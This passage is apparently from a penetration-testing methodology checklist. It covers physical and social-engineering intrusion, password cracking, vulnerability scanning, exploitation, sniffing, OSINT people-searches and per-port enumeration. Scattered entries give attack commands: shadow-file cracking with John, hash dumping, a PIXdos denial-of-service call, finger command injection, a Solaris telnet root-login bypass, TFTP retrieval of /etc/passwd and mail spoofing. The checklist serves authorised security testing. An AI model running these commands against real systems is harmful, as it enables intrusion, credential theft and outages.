8.3.1.2. Fake ID
8.3.1.2.1. Attempt to use fake ID to gain access.
8.3.1.3. Access Methods
8.3.1.3.1. Test 'out of hours' entry methods
8.3.2. Unguarded Doors
8.3.2.1. Identify all unguardedentry points.
8.3.2.1.1. Are doors secured?
8.3.2.1.2. Check locks for resistance to lock picking.
8.3.3. Windows
8.3.3.1. Check windows/doors for visible intruderalarm sensors.
8.3.3.1.1. Attempt to bypass sensors.
8.3.3.2. Check visible areas for sensitive information.
8.4. Office Waste
8.4.1. Dumpster DivingAttempt to retrieve any useful information from ToE refuse. This may include : printed documents, books, manuals, laptops, PDA's, USB memory devices, CD's, Floppy discs etc
9. Password cracking
9.1. Rainbow crack
9.1.1. ophcrack
9.1.2. rainbow tables
9.1.2.1. rcrack c:\rainbowcrack\*.rt -f pwfile.txt
9.2. Ophcrack
9.3. Cain & Abel
9.4. John the Ripper
9.4.1. ./unshadow passwd shadow > file_to_crack
9.4.2. ./john -single file_to_crack
9.4.3. ./john -w=location_of_dictionary_file -rules file_to_crack
9.4.4. ./john -show file_to_crack
9.4.5. ./john --incremental:All file_to_crack
9.5. fgdump
9.5.1. fgdump [-t][-c][-w][-s][-r][-v][-k][-l logfile][-T threads] {{-h Host | -f filename} -u Username -p Password | -H filename} i.e. fgdump.exe -u hacker -p hard_password -c -f target.txt
9.6. pwdump6
9.6.1. pwdump [-h][-o][-u][-p] machineName
9.7. medusa
9.8. LCP
9.9. L0phtcrack (Note: - This tool was aquired by Symantec from @Stake and it is there policy not to ship outside the USA and Canada
9.9.1. Domain credentials
9.9.2. Sniffing
9.9.3. pwdump import
9.9.4. sam import
9.10. aiocracker
9.10.1. aiocracker.py [md5, sha1, sha256, sha384, sha512] hash dictionary_list
10. Vulnerability Assessment - Utilising vulnerability scanners all discovered hosts can then be tested for vulnerabilities. The result would then be analysed to determine if there any vulnerabilities that could be exploited to gain access to a target host on a network. A number of tests carried out by these scanners are just banner grabbing/ obtaining version information, once these details are known, the version is compared with any common vulnerabilities and exploits (CVE) that have been released and reported to the user. Other tools actually use manual pen testing methods and display the output received i.e. showmount -e ip_address would display the NFS shares available to the scanner whcih would then need to be verified by the tester.
10.1. Manual
10.1.1. Patch Levels
10.1.2. Confirmed Vulnerabilities
10.1.2.1. Severe
10.1.2.2. High
10.1.2.3. Medium
10.1.2.4. Low
10.2. Automated
10.2.1. Reports
10.2.2. Vulnerabilities
10.2.2.1. Severe
10.2.2.2. High
10.2.2.3. Medium
10.2.2.4. Low
10.3. Tools
10.3.1. GFI
10.3.2. Nessus (Linux)
10.3.2.1. Nessus (Windows)
10.3.3. NGS Typhon
10.3.4. NGS Squirrel for Oracle
10.3.5. NGS Squirrel for SQL
10.3.6. SARA
10.3.7. MatriXay
10.3.8. BiDiBlah
10.3.9. SSA
10.3.10. Oval Interpreter
10.3.11. Xscan
10.3.12. Security Manager +
10.3.13. Inguma
10.4. Resources
10.4.1. Security Focus
10.4.2. Microsoft Security Bulletin
10.4.3. Common Vulnerabilities and Exploits (CVE)
10.4.4. National Vulnerability Database (NVD)
10.4.5. The Open Source Vulnerability Database (OSVDB)
10.4.5.1. Standalone Database
10.4.5.1.1. Update URL
10.4.6. United States Computer Emergency Response Team (US-CERT)
10.4.7. Computer Emergency Response Team
10.4.8. Mozilla Security Information
10.4.9. SANS
10.4.10. Securiteam
10.4.11. PacketStorm Security
10.4.12. Security Tracker
10.4.13. Secunia
10.4.14. Vulnerabilities.org
10.4.15. ntbugtraq
10.4.16. Wireless Vulnerabilities and Exploits (WVE)
10.5. Blogs
10.5.1. Carnal0wnage
10.5.2. Fsecure Blog
10.5.3. g0ne blog
10.5.4. GNUCitizen
10.5.5. ha.ckers Blog
10.5.6. Jeremiah Grossman Blog
10.5.7. Metasploit
10.5.8. nCircle Blogs
10.5.9. pentest mokney.net
10.5.10. Rational Security
10.5.11. Rise Security
10.5.12. Security Fix Blog
10.5.13. Software Vulnerability Exploitation Blog
10.5.14. Taosecurity Blog
11. Penetration - An exploit usually relates to the existence of some flaw or vulnerability in an application or operating system that if used could lead to privilege escalation or denial of service against the computer system that is being attacked. Exploits can be compiled and used manually or various engines exist that are essentially at the lowest level pre-compiled point and shoot tools. These engines do also have a number of other extra underlying features for more advanced users.
11.1. Password Attacks
11.1.1. Known Accounts
11.1.1.1. Identified Passwords
11.1.1.2. Unidentified Hashes
11.1.2. Default Accounts
11.1.2.1. Identified Passwords
11.1.2.2. Unidentified Hashes
11.2. Exploits
11.2.1. Successful Exploits
11.2.1.1. Accounts
11.2.1.1.1. Passwords
11.2.1.1.2. Groups
11.2.1.1.3. Other Details
11.2.1.2. Services
11.2.1.3. Backdoor
11.2.1.4. Connectivity
11.2.2. Unsuccessful Exploits
11.2.3. Resources
11.2.3.1. Securiteam
11.2.3.1.1. Exploits are sorted by year and must be downloaded individually
11.2.3.2. SecurityForest
11.2.3.2.1. Updated via CVS after initial install
11.2.3.3. GovernmentSecurity
11.2.3.3.1. Need to create and account to obtain access
11.2.3.4. Red Base Security
11.2.3.4.1. Oracle Exploit site only
11.2.3.5. Wireless Vulnerabilities & Exploits (WVE)
11.2.3.5.1. Wireless Exploit Site
11.2.3.6. PacketStorm Security
11.2.3.6.1. Exploits downloadable by month and year but no indexing carried out.
11.2.3.7. SecWatch
11.2.3.7.1. Exploits sorted by year and month, download seperately
11.2.3.8. SecurityFocus
11.2.3.8.1. Exploits must be downloaded individually
11.2.3.9. Metasploit
11.2.3.9.1. Install and regualrly update via svn
11.2.3.10. Milw0rm
11.2.3.10.1. Exploit archived indexed and sorted by port download as a whole - The one to go for!
11.3. Tools
11.3.1. Metasploit
11.3.1.1. Free Extra Modules
11.3.1.1.1. local copy
11.3.2. Manual SQL Injection
11.3.2.1. Understanding SQL Injection
11.3.2.2. SQL Injection walkthrough
11.3.2.3. SQL Injection by example
11.3.2.4. Blind SQL Injection
11.3.2.5. Advanced SQL Injection in SQL Server
11.3.2.6. More Advanced SQL Injection
11.3.2.7. Advanced SQL Injection in Oracle databases
11.3.2.8. SQL Cheatsheets
11.3.2.8.1. Untitled
11.3.3. SQL Power Injector
11.3.4. SecurityForest
11.3.5. SPI Dynamics WebInspect
11.3.6. Core Impact
11.3.7. Cisco Global Exploiter
11.3.8. PIXDos
11.3.8.1. perl PIXdos.pl [ --device=interface ] [--source=IP] [--dest=IP] [--sourcemac=M AC] [--destmac=MAC] [--port=n]
11.3.9. CANVAS
11.3.10. Inguma
12. Network Backbone
12.1. Generic Toolset
12.1.1. Wireshark (Formerly Ethereal)
12.1.1.1. Passive Sniffing
12.1.1.1.1. Usernames/Passwords
12.1.1.1.2. Email
12.1.1.1.3. FTP
12.1.1.1.4. HTTP
12.1.1.1.5. HTTPS
12.1.1.1.6. RDP
12.1.1.1.7. VOIP
12.1.1.1.8. Other
12.1.1.2. Filters
12.1.1.2.1. ip.src == ip_address
12.1.1.2.2. ip.dst == ip_address
12.1.1.2.3. tcp.dstport == port_no.
12.1.1.2.4. ! ip.addr == ip_address
12.1.1.2.5. (ip.addr eq ip_address and ip.addr eq ip_address) and (tcp.port eq 1829 and tcp.port eq 1863)
12.1.2. Cain & Abel
12.1.2.1. Active Sniffing
12.1.2.1.1. ARP Cache Poisoning
12.1.2.1.2. DNS Poisoning
12.1.2.1.3. Routing Protocols
12.1.3. Cisco-Torch
12.1.3.1. ./cisco-torch.pl <options> <IP,hostname,network> or ./cisco-torch.pl <options> -F <hostlist>
12.1.4. NTP-Fingerprint
12.1.4.1. perl ntp-fingerprint.pl -t [ip_address]
12.1.5. Yersinia
12.1.6. p0f
12.1.6.1. ./p0f [ -f file ] [ -i device ] [ -s file ] [ -o file ] [ -w file ] [ -Q sock ] [ -u user ] [ -FXVONDUKASCMRqtpvdlr ] [ -c size ] [ -T nn ] [ 'filter rule' ]
12.1.7. Manual Check (Credentials required)
12.1.8. MAC Spoofing
12.1.8.1. mac address changer for windows
12.1.8.2. macchanger
12.1.8.2.1. Random Mac Address:- macchanger -r eth0
12.1.8.3. madmacs
12.1.8.4. smac
12.1.8.5. TMAC
13. Contributors
13.1. Matt Byrne (WirelessDefence.org)
13.1.1. Matt contributed the majority of the Wireless section.
13.2. Arvind Doraiswamy (Paladion.net)
13.2.1. Arvind kindly contributed to the associated MySQL section when coming across TCP Port 3306 open.
13.3. Lee Lawson (Dns.co.uk)
13.3.1. Lee contributed the majority of the Cisco and Social Engineering sections.
13.4. Nabil OUCHN (Security-database.com)
13.4.1. Nabil contributed the AS/400 section.
14. Pre-Inspection Visit - template
15. Network Footprinting (Reconnaissance) The tester would attempt to gather as much information as possible about the selected network. Reconnaissance can take two forms i.e. active and passive. A passive attack is always the best starting point as this would normally defeat intrusion detection systems and other forms of protection etc. afforded to the network. This would usually involve trying to discover publicly available information by utilising a web browser and visiting newsgroups etc. An active form would be more intrusive and may show up in audit logs and may take the form of an attempted DNS zone transfer or a social engineering type of attack.
15.1. Untitled
15.1.1. Authoratitive Bodies
15.1.1.1. IANA - Internet Assigned Numbers Authority
15.1.1.2. ICANN - Internet Corporation for Assigned Names and Numbers.
15.1.1.3. NRO - Number Resource Organisation
15.1.1.4. RIR - Regional Internet Registry
15.1.1.4.1. AFRINIC - African Network Information Centre
15.1.1.4.2. APNIC - Asia Pacific Network Information Centre
15.1.1.4.3. ARIN - American Registry for Internet Numbers
15.1.1.4.4. LACNIC - Latin America & Caribbean Network Information Centre
15.1.1.4.5. RIPE - Reseaux IP Européens—Network Coordination Centre
15.1.2. Websites
15.1.2.1. Central Ops
15.1.2.1.1. Domain Dossier
15.1.2.1.2. Email Dossier
15.1.2.2. DNS Stuff
15.1.2.2.1. Online DNS one-stop shop, with the ability to perform a great deal of disparate DNS type queries.
15.1.2.3. Fixed Orbit
15.1.2.3.1. Autonomous System lookups and other online tools available.
15.1.2.4. Geektools
15.1.2.5. IP2Location
15.1.2.5.1. Allows limited free IP lookups to be performed, displaying geolocation information, ISP details and other pertinent information.
15.1.2.6. Kartoo
15.1.2.6.1. Metasearch engine that visually presents its results.
15.1.2.7. MyIPNeighbors.com
15.1.2.7.1. Excellent site that gives you details of shared domains on the IP queried/ conversely IP to DNS resolution
15.1.2.8. My-IP-Neighbors.com
15.1.2.8.1. Excellent site that can be used if the above is down
15.1.2.9. myipneighbors.net
15.1.2.10. Netcraft
15.1.2.10.1. Online search tool allowing queries for host information.
15.1.2.11. Passive DNS Replication
15.1.2.11.1. Finds shared domains based on supplied IP addresses
15.1.2.11.2. Note: - Website utilised by nmap hostmap.nse script
15.1.2.12. Robtex
15.1.2.12.1. Excellent website allowing DNS and AS lookups to be performed with a graphical display of the results with pointers, A, MX records and AS connectivity displayed.
15.1.2.12.2. Note: - Can be unreliable with old entries (Use CentralOps to verify)
15.1.2.13. Traceroute.org
15.1.2.13.1. Website listing a large number links to online traceroute resources.
15.1.2.14. Wayback Machine
15.1.2.14.1. Stores older versions of websites, making it a good comparison tool and excellent resource for previously removed data.
15.1.2.15. Whois.net
15.1.3. Tools
15.1.3.1. Cheops-ng
15.1.3.2. Country whois
15.1.3.3. Domain Research Tool
15.1.3.4. Firefox Plugins
15.1.3.4.1. AS Number
15.1.3.4.2. Shazou
15.1.3.4.3. Firecat Suite
15.1.3.5. Gnetutil
15.1.3.6. Goolag Scanner
15.1.3.7. Greenwich
15.1.3.8. Maltego
15.1.3.9. GTWhois
15.1.3.10. Sam Spade
15.1.3.11. Smart whois
15.1.3.12. SpiderFoot
15.2. Internet Search
15.2.1. General Information
15.2.1.1. Web Investigator
15.2.1.2. Tracesmart
15.2.1.3. Friends Reunited
15.2.1.4. Ebay - profiles etc.
15.2.2. Financial
15.2.2.1. EDGAR - Company information, including real-time filings. US
15.2.2.2. Google Finance - General Finance Portal
15.2.2.3. Hoovers - Business Intelligence, Insight and Results. US and UK
15.2.2.4. Companies House UK
15.2.2.5. Land Registry UK
15.2.3. Phone book/ Electoral Role Information
15.2.3.1. 123people
15.2.3.1.1. http://www.123people.co.uk/s/firstname+lastname/world
15.2.3.2. 192.com
15.2.3.2.1. Electoral Role Search. UK
15.2.3.3. 411
15.2.3.3.1. Online White Pages and Yellow Pages. US
15.2.3.4. Untitled
15.2.3.4.1. Background Check, Phone Number Lookup, Trace email, Criminal record, Find People, cell phone number search, License Plate Search. US
15.2.3.5. BT.com. UK
15.2.3.5.1. Residential
15.2.3.5.2. Business
15.2.3.6. Pipl
15.2.3.6.1. Untitled
15.2.3.6.2. http://pipl.com/search/?Email=john%40example.com&CategoryID=4&Interface=1
15.2.3.6.3. http://pipl.com/search/?Username=????&CategoryID=5&Interface=1
15.2.3.7. Spokeo
15.2.3.7.1. http://www.spokeo.com/user?q=domain_name
15.2.3.7.2. http://www.spokeo.com/user?q=email_address
15.2.3.8. Yasni
15.2.3.8.1. http://www.yasni.co.uk/index.php?action=search&search=1&sh=&name=firstname+lastname&filter=Keyword
15.2.3.9. Zabasearch
15.2.3.9.1. People Search Engine. US
15.2.4. Generic Web Searching
15.2.4.1. Code Search
15.2.4.2. Forum Entries
15.2.4.3. Google Hacking Database
15.2.4.4. Google
15.2.4.4.1. Back end files
15.2.4.4.2. Email Addresses
15.2.4.4.3. Contact Details
15.2.4.5. Newsgroups/forums
15.2.4.6. Blog Search
15.2.4.6.1. Yammer
15.2.4.6.2. Google Blog Search
15.2.4.6.3. Technorati
15.2.4.6.4. Jaiku
15.2.4.6.5. Present.ly
15.2.4.6.6. Twitter Network Browser
15.2.4.7. Search Engine Comparison/ Aggregator Sites
15.2.4.7.1. Clusty
15.2.4.7.2. Grokker
15.2.4.7.3. Zuula
15.2.4.7.4. Exalead
15.2.4.7.5. Delicious
15.2.5. Metadata Search
15.2.5.1. Untitled
15.2.5.1.1. MetaData Visualisation Sites
15.2.5.1.2. Tools
15.2.5.1.3. Wikipedia Metadata Search
15.2.6. Social/ Business Networks
15.2.6.1. Untitled
15.2.6.1.1. Africa
15.2.6.1.2. Australia
15.2.6.1.3. Belgium
15.2.6.1.4. Holland
15.2.6.1.5. Hungary
15.2.6.1.6. Iran
15.2.6.1.7. Japan
15.2.6.1.8. Korea
15.2.6.1.9. Poland
15.2.6.1.10. Russia
15.2.6.1.11. Sweden
15.2.6.1.12. UK
15.2.6.1.13. US
15.2.6.1.14. Assorted
15.2.7. Resources
15.2.7.1. OSINT
15.2.7.2. International Directory of Search Engines
15.3. DNS Record Retrieval from publically available servers
15.3.1. Types of Information Records
15.3.1.1. SOA Records - Indicates the server that has authority for the domain.
15.3.1.2. MX Records - List of a host’s or domain’s mail exchanger server(s).
15.3.1.3. NS Records - List of a host’s or domain’s name server(s).
15.3.1.4. A Records - An address record that allows a computer name to be translated to an IP address. Each computer has to have this record for its IP address to be located via DNS.
15.3.1.5. PTR Records - Lists a host’s domain name, host identified by its IP address.
15.3.1.6. SRV Records - Service location record.
15.3.1.7. HINFO Records - Host information record with CPU type and operating system.
15.3.1.8. TXT Records - Generic text record.
15.3.1.9. CNAME - A host’s canonical name allows additional names/ aliases to be used to locate a computer.
15.3.1.10. RP - Responsible person for the domain.
15.3.2. Database Settings
15.3.2.1. Version.bind
15.3.2.2. Serial
15.3.2.3. Refresh
15.3.2.4. Retry
15.3.2.5. Expiry
15.3.2.6. Minimum
15.3.3. Sub Domains
15.3.4. Internal IP ranges
15.3.4.1. Reverse DNS for IP Range
15.3.5. Zone Transfer
15.4. Social Engineering
15.4.1. Remote
15.4.1.1. Phone
15.4.1.1.1. Scenarios
15.4.1.1.2. Results
15.4.1.1.3. Contact Details
15.4.1.2. Email
15.4.1.2.1. Scenarios
15.4.1.2.2. Software
15.4.1.2.3. Results
15.4.1.2.4. Contact Details
15.4.1.3. Other
15.4.2. Local
15.4.2.1. Personas
15.4.2.1.1. Name
15.4.2.1.2. Phone
15.4.2.1.3. Email
15.4.2.1.4. Business Cards
15.4.2.2. Contact Details
15.4.2.2.1. Name
15.4.2.2.2. Phone number
15.4.2.2.3. Email
15.4.2.2.4. Room number
15.4.2.2.5. Department
15.4.2.2.6. Role
15.4.2.3. Scenarios
15.4.2.3.1. New IT employee
15.4.2.3.2. Fire Inspector
15.4.2.4. Results
15.4.2.5. Maps
15.4.2.5.1. Satalitte Imagery
15.4.2.5.2. Building layouts
15.4.2.6. Other
15.5. Dumpster Diving
15.5.1. Rubbish Bins
15.5.2. Contract Waste Removal
15.5.3. Ebay ex-stock sales i.e. HDD
15.6. Web Site copy
15.6.1. htttrack
15.6.2. teleport pro
15.6.3. Black Widow
16. Enumeration
16.1. Daytime port 13 open
16.1.1. nmap nse script
16.1.1.1. daytime
16.2. FTP port 21 open
16.2.1. Fingerprint server
16.2.1.1. telnet ip_address 21 (Banner grab)
16.2.1.2. Run command ftp ip_address
16.2.1.3. ftp@example.com
16.2.1.4. Check for anonymous access
16.2.1.4.1. ftp ip_addressUsername: anonymous OR anonPassword: any@email.com
16.2.2. Password guessing
16.2.2.1. Hydra brute force
16.2.2.2. medusa
16.2.2.3. Brutus
16.2.3. Examine configuration files
16.2.3.1. ftpusers
16.2.3.2. ftp.conf
16.2.3.3. proftpd.conf
16.2.4. MiTM
16.2.4.1. pasvagg.pl
16.3. SSH port 22 open
16.3.1. Fingerprint server
16.3.1.1. telnet ip_address 22 (banner grab)
16.3.1.2. scanssh
16.3.1.2.1. scanssh -p -r -e excludes random(no.)/Network_ID/Subnet_Mask
16.3.2. Password guessing
16.3.2.1. ssh root@ip_address
16.3.2.2. guess-who
16.3.2.2.1. ./b -l username -h ip_address -p 22 -2 < password_file_location
16.3.2.3. Hydra brute force
16.3.2.4. brutessh
16.3.2.5. Ruby SSH Bruteforcer
16.3.3. Examine configuration files
16.3.3.1. ssh_config
16.3.3.2. sshd_config
16.3.3.3. authorized_keys
16.3.3.4. ssh_known_hosts
16.3.3.5. .shosts
16.3.4. SSH Client programs
16.3.4.1. tunnelier
16.3.4.2. winsshd
16.3.4.3. putty
16.3.4.4. winscp
16.4. Telnet port 23 open
16.4.1. Fingerprint server
16.4.1.1. telnet ip_address
16.4.1.1.1. Common Banner ListOS/BannerSolaris 8/SunOS 5.8Solaris 2.6/SunOS 5.6Solaris 2.4 or 2.5.1/Unix(r) System V Release 4.0 (hostname)SunOS 4.1.x/SunOS Unix (hostname)FreeBSD/FreeBSD/i386 (hostname) (ttyp1)NetBSD/NetBSD/i386 (hostname) (ttyp1)OpenBSD/OpenBSD/i386 (hostname) (ttyp1)Red Hat 8.0/Red Hat Linux release 8.0 (Psyche)Debian 3.0/Debian GNU/Linux 3.0 / hostnameSGI IRIX 6.x/IRIX (hostname)IBM AIX 4.1.x/AIX Version 4 (C) Copyrights by IBM and by others 1982, 1994.IBM AIX 4.2.x or 4.3.x/AIX Version 4 (C) Copyrights by IBM and by others 1982, 1996.Nokia IPSO/IPSO (hostname) (ttyp0)Cisco IOS/User Access VerificationLivingston ComOS/ComOS - Livingston PortMaster
16.4.1.2. telnetfp
16.4.2. Password Attack
16.4.2.1. Untitled
16.4.2.2. Hydra brute force
16.4.2.3. Brutus
16.4.2.4. telnet -l "-froot" hostname (Solaris 10+)
16.4.3. Examine configuration files
16.4.3.1. /etc/inetd.conf
16.4.3.2. /etc/xinetd.d/telnet
16.4.3.3. /etc/xinetd.d/stelnet
16.5. Sendmail Port 25 open
16.5.1. Fingerprint server
16.5.1.1. telnet ip_address 25 (banner grab)
16.5.2. Mail Server Testing
16.5.2.1. Enumerate users
16.5.2.1.1. VRFY username (verifies if username exists - enumeration of accounts)
16.5.2.1.2. EXPN username (verifies if username is valid - enumeration of accounts)
16.5.2.2. Mail Spoof Test
16.5.2.2.1. HELO anything MAIL FROM: spoofed_address RCPT TO:valid_mail_account DATA . QUIT
16.5.2.3. Mail Relay Test
16.5.2.3.1. Untitled
16.5.3. Examine Configuration Files
16.5.3.1. sendmail.cf
16.5.3.2. submit.cf
16.6. DNS port 53 open
16.6.1. Fingerprint server/ service
16.6.1.1. host
16.6.1.1.1. host [-aCdlnrTwv ] [-c class ] [-N ndots ] [-R number ] [-t type ] [-W wait ] name [server ] -v verbose format -t (query type) Allows a user to specify a record type i.e. A, NS, or PTR. -a Same as –t ANY. -l Zone transfer (if allowed). -f Save to a specified filename.
16.6.1.2. nslookup
16.6.1.2.1. nslookup [ -option ... ] [ host-to-find | - [ server ]]
16.6.1.3. dig
16.6.1.3.1. dig [ @server ] [-b address ] [-c class ] [-f filename ] [-k filename ] [-p port# ] [-t type ] [-x addr ] [-y name:key ] [-4 ] [-6 ] [name ] [type ] [class ] [queryopt... ]
16.6.1.4. whois-h Use the named host to resolve the query -a Use ARIN to resolve the query -r Use RIPE to resolve the query -p Use APNIC to resolve the query -Q Perform a quick lookup
16.6.2. DNS Enumeration
16.6.2.1. Bile Suite
16.6.2.1.1. perl BiLE.pl [website] [project_name]
16.6.2.1.2. perl BiLE-weigh.pl [website] [input file]
16.6.2.1.3. perl vet-IPrange.pl [input file] [true domain file] [output file] <range>
16.6.2.1.4. perl vet-mx.pl [input file] [true domain file] [output file]
16.6.2.1.5. perl exp-tld.pl [input file] [output file]
16.6.2.1.6. perl jarf-dnsbrute [domain_name] (brutelevel) [file_with_names]
16.6.2.1.7. perl qtrace.pl [ip_address_file] [output_file]
16.6.2.1.8. perl jarf-rev [subnetblock] [nameserver]
16.6.2.2. txdns
16.6.2.2.1. txdns -rt -t domain_name
16.6.2.2.2. txdns -x 50 -bb domain_name
16.6.2.2.3. txdns --verbose -fm wordlist.dic --server ip_address -rr SOA domain_name -h c: \hostlist.txt
16.6.2.3. nmap nse scripts
16.6.2.3.1. dns-random-srcport
16.6.2.3.2. dns-random-txid
16.6.2.3.3. dns-recursion
16.6.2.3.4. dns-zone-transfer
16.6.3. Examine Configuration Files
16.6.3.1. host.conf
16.6.3.2. resolv.conf
16.6.3.3. named.conf
16.7. TFTP port 69 open
16.7.1. TFTP Enumeration
16.7.1.1. tftp ip_address PUT local_file
16.7.1.2. tftp ip_address GET conf.txt (or other files)
16.7.1.3. Solarwinds TFTP server
16.7.1.4. tftp – i <IP> GET /etc/passwd (old Solaris)
16.7.2. TFTP Bruteforcing
16.7.2.1. TFTP bruteforcer
16.7.2.2. Cisco-Torch
16.8. Finger Port 79 open
16.8.1. User enumeration
16.8.1.1. finger 'a b c d e f g h' @example.com
16.8.1.2. finger admin@example.com
16.8.1.3. finger user@example.com
16.8.1.4. finger 0@example.com
16.8.1.5. finger .@example.com
16.8.1.6. finger **@example.com
16.8.1.7. finger test@example.com
16.8.1.8. finger @example.com
16.8.1.9. nmap nse script
16.8.1.9.1. finger
16.8.2. Command execution
16.8.2.1. finger "|/bin/id@example.com"
16.8.2.2. finger "|/bin/ls -a /@example.com"
16.8.3. Finger Bounce
16.8.3.1. finger user@host@victim
16.8.3.2. finger @internal@external
16.9. Web Ports 80,8080 etc. open
16.9.1. Fingerprint server
16.9.1.1. Telnet ip_address port
16.9.1.2. Firefox plugins
16.9.1.2.1. All
16.9.1.2.2. Specific
16.9.2. Crawl website
16.9.2.1. lynx [options] startfile/URL Options include -traversal -crawl -dump -image_links -source
16.9.2.2. httprint
16.9.2.3. Metagoofil
16.9.2.3.1. metagoofil.py -d [domain] -l [no. of] -f [type] -o results.html
16.9.3. Web Directory enumeration
16.9.3.1. Nikto
16.9.3.1.1. nikto [-h target] [options]
16.9.3.2. DirBuster
16.9.3.3. Wikto
16.9.3.4. Goolag Scanner
16.9.4. Vulnerability Assessment
16.9.4.1. Manual Tests
16.9.4.1.1. Default Passwords
16.9.4.1.2. Install Backdoors
16.9.4.1.3. Method Testing
16.9.4.1.4. Upload Files
16.9.4.1.5. View Page Source
16.9.4.1.6. Input Validation Checks
16.9.4.1.7. Automated table and column iteration
16.9.4.2. Vulnerability Scanners
16.9.4.2.1. Acunetix
16.9.4.2.2. Grendelscan
16.9.4.2.3. NStealth
16.9.4.2.4. Obiwan III
16.9.4.2.5. w3af
16.9.4.3. Specific Applications/ Server Tools
16.9.4.3.1. Domino
16.9.4.3.2. Joomla
16.9.4.3.3. aspaudit.pl
16.9.4.3.4. Vbulletin
16.9.4.3.5. ZyXel
16.9.5. Proxy Testing
16.9.5.1. Burpsuite
16.9.5.2. Crowbar
16.9.5.3. Interceptor
16.9.5.4. Paros
16.9.5.5. Requester Raw
16.9.5.6. Suru
16.9.5.7. WebScarab
16.9.6. Examine configuration files
16.9.6.1. Generic
16.9.6.1.1. Examine httpd.conf/ windows config files
16.9.6.2. JBoss
16.9.6.2.1. JMX Console http://<IP>:8080/jmxconcole/
16.9.6.3. Joomla
16.9.6.3.1. configuration.php
16.9.6.3.2. diagnostics.php
16.9.6.3.3. joomla.inc.php
16.9.6.3.4. config.inc.php
16.9.6.4. Mambo
16.9.6.4.1. configuration.php
16.9.6.4.2. config.inc.php
16.9.6.5. Wordpress
16.9.6.5.1. setup-config.php
16.9.6.5.2. wp-config.php
16.9.6.6. ZyXel
16.9.6.6.1. /WAN.html (contains PPPoE ISP password)
16.9.6.6.2. /WLAN_General.html and /WLAN.html (contains WEP key)
16.9.6.6.3. /rpDyDNS.html (contains DDNS credentials)
16.9.6.6.4. /Firewall_DefPolicy.html (Firewall)
16.9.6.6.5. /CF_Keyword.html (Content Filter)
16.9.6.6.6. /RemMagWWW.html (Remote MGMT)
16.9.6.6.7. /rpSysAdmin.html (System)
16.9.6.6.8. /LAN_IP.html (LAN)
16.9.6.6.9. /NAT_General.html (NAT)
16.9.6.6.10. /ViewLog.html (Logs)
16.9.6.6.11. /rpFWUpload.html (Tools)
16.9.6.6.12. /DiagGeneral.html (Diagnostic)
16.9.6.6.13. /RemMagSNMP.html (SNMP Passwords)
16.9.6.6.14. /LAN_ClientList.html (Current DHCP Leases)
16.9.6.6.15. Config Backups
16.9.7. Examine web server logs
16.9.7.1. c:\winnt\system32\Logfiles\W3SVC1
16.9.7.1.1. awk -F " " '{print $3,$11} filename | sort | uniq
16.9.8. References
16.9.8.1. White Papers
16.9.8.1.1. Cross Site Request Forgery: An Introduction to a Common Web Application Weakness
16.9.8.1.2. Attacking Web Service Security: Message Oriented Madness, XML Worms and Web Service Security Sanity
16.9.8.1.3. Blind Security Testing - An Evolutionary Approach
16.9.8.1.4. Command Injection in XML Signatures and Encryption
16.9.8.1.5. Input Validation Cheat Sheet
16.9.8.1.6. SQL Injection Cheat Sheet
16.9.8.2. Books
16.9.8.2.1. Hacking Exposed Web 2.0
16.9.8.2.2. Hacking Exposed Web Applications
16.9.8.2.3. The Web Application Hacker's Handbook
16.9.9. Exploit Frameworks
16.9.9.1. Brute-force Tools
16.9.9.1.1. Acunetix
16.9.9.2. Metasploit
16.9.9.3. w3af
16.10. Portmapper port 111 open
16.10.1. rpcdump.py
16.10.1.1. rpcdump.py username:password@IP_Address port/protocol (i.e. 80/HTTP)
16.10.2. rpcinfo
16.10.2.1. rpcinfo [options] IP_Address
16.11. NTP Port 123 open
16.11.1. NTP Enumeration
16.11.1.1. ntpdc -c monlist IP_ADDRESS
16.11.1.2. ntpdc -c sysinfo IP_ADDRESS
16.11.1.3. ntpq
16.11.1.3.1. host
16.11.1.3.2. hostname
16.11.1.3.3. ntpversion
16.11.1.3.4. readlist
16.11.1.3.5. version
16.11.2. Examine configuration files
16.11.2.1. ntp.conf
16.11.3. nmap nse script
16.11.3.1. ntp-info
16.12. NetBIOS Ports 135-139,445 open
16.12.1. NetBIOS enumeration
16.12.1.1. Enum
16.12.1.1.1. enum <-UMNSPGLdc> <-u username> <-p password> <-f dictfile> <hostname|ip>
16.12.1.2. Null Session
16.12.1.2.1. net use \\192.168.1.1\ipc$ "" /u:""
16.12.1.3. Smbclient
16.12.1.3.1. smbclient -L //server/share password options
16.12.1.4. Superscan
16.12.1.4.1. Enumeration tab.
16.12.1.5. user2sid/sid2user
16.12.1.6. Winfo
16.12.2. NetBIOS brute force
16.12.2.1. Hydra
16.12.2.2. Brutus
16.12.2.3. Cain & Abel
16.12.2.4. getacct
16.12.2.5. NAT (NetBIOS Auditing Tool)
16.12.3. Examine Configuration Files
16.12.3.1. Smb.conf
16.12.3.2. lmhosts
16.13. SNMP port 161 open
16.13.1. Default Community Strings
16.13.1.1. public
16.13.1.2. private
16.13.1.3. cisco
16.13.1.3.1. cable-docsis
16.13.1.3.2. ILMI
16.13.2. MIB enumeration
16.13.2.1. Windows NT
16.13.2.1.1. .1.3.6.1.2.1.1.5 Hostnames
16.13.2.1.2. .1.3.6.1.4.1.77.1.4.2 Domain Name
16.13.2.1.3. .1.3.6.1.4.1.77.1.2.25 Usernames
16.13.2.1.4. .1.3.6.1.4.1.77.1.2.3.1.1 Running Services
16.13.2.1.5. .1.3.6.1.4.1.77.1.2.27 Share Information
16.13.2.2. Solarwinds MIB walk
16.13.2.3. Getif
16.13.2.4. snmpwalk
16.13.2.4.1. snmpwalk -v <Version> -c <Community string> <IP>
16.13.2.5. Snscan
16.13.2.6. Applications
16.13.2.6.1. ZyXel
16.13.2.7. nmap nse script
16.13.2.7.1. snmp-sysdescr
16.13.3. SNMP Bruteforce
16.13.3.1. onesixtyone
16.13.3.1.1. onesixytone -c SNMP.wordlist <IP>
16.13.3.2. cat
16.13.3.2.1. ./cat -h <IP> -w SNMP.wordlist
16.13.3.3. Solarwinds SNMP Brute Force
16.13.3.4. ADMsnmp
16.13.3.5. nmap nse script
16.13.3.5.1. snmp-brute
16.13.4. Examine SNMP Configuration files
16.13.4.1. snmp.conf
16.13.4.2. snmpd.conf
16.13.4.3. snmp-config.xml
16.14. LDAP Port 389 Open
16.14.1. ldap enumeration
16.14.1.1. ldapminer
16.14.1.1.1. ldapminer -h ip_address -p port (not required if default) -d
16.14.1.2. luma
16.14.1.2.1. Gui based tool
16.14.1.3. ldp
16.14.1.3.1. Gui based tool
16.14.1.4. openldap
